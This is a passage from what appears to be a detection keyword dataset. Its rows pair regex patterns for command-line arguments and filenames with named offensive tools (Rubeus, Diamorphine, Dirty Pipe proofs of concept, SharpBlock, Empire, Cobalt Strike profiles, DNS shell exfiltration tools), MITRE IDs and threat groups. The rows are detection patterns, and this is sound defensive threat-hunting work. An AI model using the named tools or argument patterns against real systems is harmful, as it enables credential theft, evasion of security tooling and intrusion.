- FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","0","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "* dhcp_dns_update_utils.py*",".{0,1000}\sdhcp_dns_update_utils\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","9","2","105","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z" "* dhcp-discover.nse*",".{0,1000}\sdhcp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE 
Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dhcpd-noroute.conf*",".{0,1000}\sdhcpd\-noroute\.conf.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" "* diagrun=true service=DNS* dllpath=*.dll* computername=*",".{0,1000}\sdiagrun\=true\sservice\=DNS.{0,1000}\sdllpath\=.{0,1000}\.dll.{0,1000}\scomputername\=.{0,1000}","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","0","N/A","7","1","75","12","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z" "* diamond * /certificate:*",".{0,1000}\sdiamond\s.{0,1000}\s\s\/certificate\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* diamond /tgtdeleg *",".{0,1000}\sdiamond\s\/tgtdeleg\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* diamond /user:*",".{0,1000}\sdiamond\s\/user\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* diamorphine.c*",".{0,1000}\sdiamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "* diamorphine.h*",".{0,1000}\sdiamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","N/A","10","10","1664","407","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z" "* dicom-brute.nse*",".{0,1000}\sdicom\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dicom-ping.nse*",".{0,1000}\sdicom\-ping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dict-info.nse*",".{0,1000}\sdict\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* DigitalOceanProxyTab.java*",".{0,1000}\sDigitalOceanProxyTab\.java.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "* DInvokeResolver.*",".{0,1000}\sDInvokeResolver\..{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "* --dirnames bank financ payable payment reconcil remit voucher vendor eft swift *",".{0,1000}\s\-\-dirnames\sbank\sfinanc\spayable\spayment\sreconcil\sremit\svoucher\svendor\seft\sswift\s.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. 
Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "* dirty.c*",".{0,1000}\sdirty\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","0","N/A","N/A","9","817","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" "* dirtycow.c *",".{0,1000}\sdirtycow\.c\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","0","N/A","N/A","10","942","392","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z" "* Dirty-Pipe.*",".{0,1000}\sDirty\-Pipe\..{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/bbaranoff/CVE-2022-0847","1","0","N/A","N/A","1","48","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z" "* Dirty-Pipe.sh*",".{0,1000}\sDirty\-Pipe\.sh.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/puckiestyle/CVE-2022-0847","1","0","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z" "* --disable-bypass-amsi*",".{0,1000}\s\-\-disable\-bypass\-amsi.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* 
--disable-bypass-cmdline*",".{0,1000}\s\-\-disable\-bypass\-cmdline.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* --disable-bypass-etw*",".{0,1000}\s\-\-disable\-bypass\-etw.{0,1000}","offensive_tool_keyword","SharpBlock","A method of bypassing EDR active projection DLL by preventing entry point exection","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CCob/SharpBlock","1","0","N/A","10","10","1057","150","2021-03-31T09:44:48Z","2020-06-14T10:32:16Z" "* DisableETW(*",".{0,1000}\sDisableETW\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* DisableWLDP(*",".{0,1000}\sDisableWLDP\(.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "* distcc-cve2004-2687.nse*",".{0,1000}\sdistcc\-cve2004\-2687\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* DLHell.py*",".{0,1000}\sDLHell\.py.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "* --dll * --only *AmsiScanBuffer*AmsiScanString*",".{0,1000}\s\-\-dll\s.{0,1000}\s\-\-only\s.{0,1000}AmsiScanBuffer.{0,1000}AmsiScanString.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "* --dll * --payload *",".{0,1000}\s\-\-dll\s.{0,1000}\s\-\-payload\s.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","7","663","81","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" "* --dll C:\Windows\System32\version.dll*--dll C:\Windows\System32\userenv.dll*",".{0,1000}\s\-\-dll\sC\:\\Windows\\System32\\version\.dll.{0,1000}\-\-dll\sC\:\\Windows\\System32\\userenv\.dll.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/Accenture/Spartacus","1","0","N/A","10","10","947","121","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z" "* --dll --dllhijack *",".{0,1000}\s\-\-dll\s\-\-dllhijack\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* dllinjection_rs.exe*",".{0,1000}\sdllinjection_rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* -DllName * -FunctionName *",".{0,1000}\s\-DllName\s.{0,1000}\s\-FunctionName\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -dns_stager_prepend *",".{0,1000}\s\-dns_stager_prepend\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* -dns_stager_subhost *",".{0,1000}\s\-dns_stager_subhost\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "* DNS-Black-CAT Server *",".{0,1000}\sDNS\-Black\-CAT\sServer\s.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","0","N/A","10","10","104","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z" "* dns-blacklist.nse*",".{0,1000}\sdns\-blacklist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-brute.nse*",".{0,1000}\sdns\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-cache-snoop.nse*",".{0,1000}\sdns\-cache\-snoop\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dnscan.py*",".{0,1000}\sdnscan\.py.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","6","10","1076","410","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "* dns-check-zone.nse*",".{0,1000}\sdns\-check\-zone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dnschef.exe*",".{0,1000}\sdnschef\.exe.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* dnschef.py*",".{0,1000}\sdnschef\.py.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. 
A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "* dns-client-subnet-scan.nse*",".{0,1000}\sdns\-client\-subnet\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dnscrypt-proxy*",".{0,1000}\sdnscrypt\-proxy.{0,1000}","offensive_tool_keyword","dnscrypt","A flexible DNS proxy with support for modern encrypted DNS protocols such as DNSCrypt v2 - DNS-over-HTTPS - Anonymized DNSCrypt and ODoH (Oblivious DoH).","T1071.004 - T1568.002 - T1557.004","TA0011 - TA0006","N/A","N/A","Defense Evasion","https://github.com/DNSCrypt/dnscrypt-proxy","1","0","N/A","10","10","10939","981","2024-04-27T20:34:07Z","2018-01-08T23:21:21Z" "* --dnsdump *",".{0,1000}\s\-\-dnsdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "* dnsdump.py*",".{0,1000}\sdnsdump\.py.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. 
similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "* dns-fuzz.nse*",".{0,1000}\sdns\-fuzz\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-ip6-arpa-scan.nse*",".{0,1000}\sdns\-ip6\-arpa\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dnslog-cn.nse*",".{0,1000}\sdnslog\-cn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. 
Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* dns-nsec3-enum.nse*",".{0,1000}\sdns\-nsec3\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-nsec-enum.nse*",".{0,1000}\sdns\-nsec\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-nsid.nse*",".{0,1000}\sdns\-nsid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-random-srcport.nse*",".{0,1000}\sdns\-random\-srcport\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-random-txid.nse*",".{0,1000}\sdns\-random\-txid\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* dns-recursion.nse*",".{0,1000}\sdns\-recursion\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap 